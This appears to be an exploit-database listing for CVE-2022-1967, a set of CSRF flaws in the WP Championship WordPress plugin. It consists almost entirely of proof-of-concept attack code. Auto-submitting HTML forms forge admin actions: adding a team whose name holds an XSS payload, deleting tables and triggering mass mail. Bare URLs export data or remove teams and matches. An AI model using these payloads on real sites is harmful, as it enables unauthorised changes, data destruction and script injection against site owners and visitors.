Exploit for WP Championship < 9.3 - Multiple CSRF CVE-2022-1967

Name: Exploit for WP Championship < 9.3 - Multiple CSRF CVE-2022-1967
Rating: 5 (107 reviews)
2022-06-16 | CVSS 4.3
## https://sploitus.com/exploit?id=WPEX-ID:02D25736-C796-49BD-B774-66E0E3FCF4C9
<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin_team.php#" method="POST">
    <input type="text" name="action" value="addteam">
    <input type="text" name="team_name" value="<img src=x onerror=alert(/XSS/)>">
    <input type="text" name="team_shortname" value="test">
    <input type="text" name="team_icon" value="b">
    <input type="text" name="group" value="A">
    <input type="text" name="qualified" value="0">
    <input type="text" name="penalty" value="0">
    <input type="hidden" id="submit" name="submit" value="Mannschaft hinzufügen »">
</form>
<script>
HTMLFormElement.prototype.submit.call(
    document.getElementById("test")
);
</script>


https://example.com/wp-admin/admin-ajax.php?action=wpc_export&dlmode=true&exmode=team&fnmode=false


<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin.php#" method="POST">
    <input type="text" name="action" value="update">
    <input type="text" name="cs_groups" value="8">
    <input type="text" name="cs_pts_winner" value="3">
    <input type="text" name="cs_pts_looser" value="0">
    <input type="text" name="cs_pts_deuce" value="1">
    <input type="text" name="cs_group_teams" value="2">
    <input type="text" name="deltables_ok" value="1">
    <input type="text" name="deltables" value="Tabellen entfernen »">
    <input type="text" name="cs_pts_tipp" value="1">
    <input type="text" name="cs_pts_tendency" value="1">
    <input type="text" name="cs_stellv_schalter" value="1">
    <input type="text" name="cs_pts_supertipp" value="5">
    <input type="text" name="cs_modus" value="1">
    <input type="text" name="cs_pts_champ" value="1">
    <input type="text" name="cs_oneside_tendency" value="0">
    <input type="text" name="cs_pts_oneside" value="0">
    <input type="text" name="cs_reminder_hours" value="">
    <input type="text" name="cs_goalsum" value="-1">
    <input type="text" name="cs_rank_trend" value="1">
    <input type="text" name="cs_final_winner" value="-1">
    <input type="text" name="cs_pts_goalsum" value="0">
    <input type="text" name="cs_floating_link" value="1">
    <input type="text" name="cs_joker_idlist" value="">
    <input type="text" name="cs_joker_player" value="">
    <input type="text" name="cs_number_of_tippdays" value="">
    <input type="text" name="cs_xmlrpc_news" value=" ">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin.php#" method="POST">
    <input type="text" name="action" value="update">
    <input type="text" name="cs_groups" value="8">
    <input type="text" name="cs_pts_winner" value="3">
    <input type="text" name="mailservice_ok" value="1">
    <input type="text" name="mailservice1" value="Mailservice auslösen »">
    <input type="text" name="cs_pts_looser" value="0">
    <input type="text" name="cs_pts_deuce" value="1">
    <input type="text" name="cs_group_teams" value="2">
    <input type="text" name="cs_pts_tipp" value="1">
    <input type="text" name="cs_pts_tendency" value="1">
    <input type="text" name="cs_stellv_schalter" value="1">
    <input type="text" name="cs_pts_supertipp" value="5">
    <input type="text" name="cs_modus" value="1">
    <input type="text" name="cs_pts_champ" value="1">
    <input type="text" name="cs_oneside_tendency" value="0">
    <input type="text" name="cs_pts_oneside" value="0">
    <input type="text" name="cs_reminder_hours" value="">
    <input type="text" name="cs_goalsum" value="-1">
    <input type="text" name="cs_rank_trend" value="1">
    <input type="text" name="cs_final_winner" value="-1">
    <input type="text" name="cs_pts_goalsum" value="0">
    <input type="text" name="cs_floating_link" value="1">
    <input type="text" name="cs_joker_idlist" value="">
    <input type="text" name="cs_joker_player" value="">
    <input type="text" name="cs_number_of_tippdays" value="">
    <input type="text" name="cs_xmlrpc_news" value=" ">
</form>
<script>
    document.getElementById("test").submit();
</script>


https://example.com/wp-admin/admin.php?page=wp-championship/cs_admin_team.php&action=remove&tid=1
https://example.com/wp-admin/admin.php?page=wp-championship/cs_admin_finals.php&action=remove&mid=1